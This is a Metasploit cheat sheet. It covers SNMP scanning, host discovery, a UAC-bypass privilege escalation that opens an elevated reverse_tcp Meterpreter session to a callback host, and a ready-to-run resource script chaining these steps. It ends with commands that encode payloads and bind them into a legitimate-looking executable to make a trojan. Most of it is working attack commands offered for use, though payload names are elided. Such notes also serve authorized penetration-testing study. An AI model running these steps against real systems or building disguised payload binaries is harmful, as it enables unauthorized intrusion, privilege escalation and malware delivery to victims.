Tool: Metasploit

General Commands:

show auxiliary
search snmp
use auxiliary/scanner/snmp/snmp_enum (the full module path; search output shows it)
info
show options
set RHOSTS ip (scanner modules take RHOSTS, which accepts a single IP, a range or a CIDR block)
run
setg RHOSTS ip (global set: the value persists across every module for the rest of the console session; unsetg clears it)

Hosts:

db_nmap ip-range --top-ports 20 (populates the hosts and services tables; needs a connected database, check with db_status first; list what was found with hosts)

Search Services:

services -p 443 (list every host in the database with port 443 recorded; add -u to show only services reported as open/up)

Modifying an exploit:

~/.msf4/modules/exploits/windows/misc/vulnserver.rb (custom or modified modules live under ~/.msf4/modules, mirroring the framework's own tree; after editing run reload_all, or reload for the currently loaded module)

Post exploitation (UAC bypass on an existing Windows Meterpreter session):
  use exploit/windows/local/bypassuac
  set SESSION <id of the existing session>
  set payload to a reverse shell (windows/meterpreter/reverse_tcp plus LHOST/LPORT) so that the bypass spawns a new, elevated session instead of reusing the old one
  run, then in the new session: getsystem, ps, and migrate to a process running as SYSTEM so the shell survives the original process exiting
  (only works when the session user is a local administrator; the stock module targets the default UAC level, not "Always notify")
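The enumeration and post-exploitation steps above chained into one msfconsole resource script, as an added example (not part of the original notes). The 10.0.0.0/24 range, LHOST 10.0.0.5, workspace name and session id 1 are placeholders; the script assumes a connected database and, for the last block, a Windows Meterpreter session that already exists. Save it as enum.rc and run it with msfconsole -q -r enum.rc.

```text
# enum.rc: constructed example, target range / LHOST / session id are placeholders
# separate this engagement's hosts and services from other work
workspace -a lab
# confirm the database is connected before relying on db_nmap
db_status
# TCP top ports populate hosts/services; SNMP is 161/udp, so a UDP scan (needs root) is required for it
db_nmap 10.0.0.0/24 --top-ports 20
db_nmap -sU -p 161 10.0.0.0/24
# what was found, then the hosts worth feeding to snmp_enum and the 443 hosts
hosts
services -p 161 -u
services -p 443 -u
# global set: every module used from here on inherits RHOSTS
setg RHOSTS 10.0.0.0/24
use auxiliary/scanner/snmp/snmp_enum
set THREADS 8
# show options confirms RHOSTS was picked up from setg before running
show options
run
# post-exploitation: assumes Meterpreter session 1 exists on a Windows host whose user is a local admin
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.5
set LPORT 4444
# on success a new, elevated session opens; getsystem and migrate are then done interactively in it
run
```

Comments on their own lines starting with # are skipped by the resource parser; keep them separate from commands rather than trailing them, since trailing text would be passed to the command as arguments.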

Encode:

msfpayload ............ | msfencode -e x86/shikata_ga_nai -c 9 -t exe -o exe.exe

(the second tool is msfencode, not msfconsole; -c is the number of encoding iterations, -t the output format. msfpayload and msfencode were removed from the framework in 2015; the msfvenom equivalent is
msfvenom -p ............ -e x86/shikata_ga_nai -i 9 -f exe -o exe.exe
Encoding avoids bad characters in the payload; it is not reliable AV evasion, multiple shikata_ga_nai iterations are well signatured.)

Binding:

msfpayload ............ | msfencode -e x86/shikata_ga_nai -c 9 -t exe -x goodexe.exe -o bound.exe

(-x uses goodexe.exe as a template so the payload is injected into a legitimate-looking binary; add -k to keep the template's original functionality running in a separate thread. msfvenom equivalent:
msfvenom -p ............ -e x86/shikata_ga_nai -i 9 -f exe -x goodexe.exe -k -o bound.exe)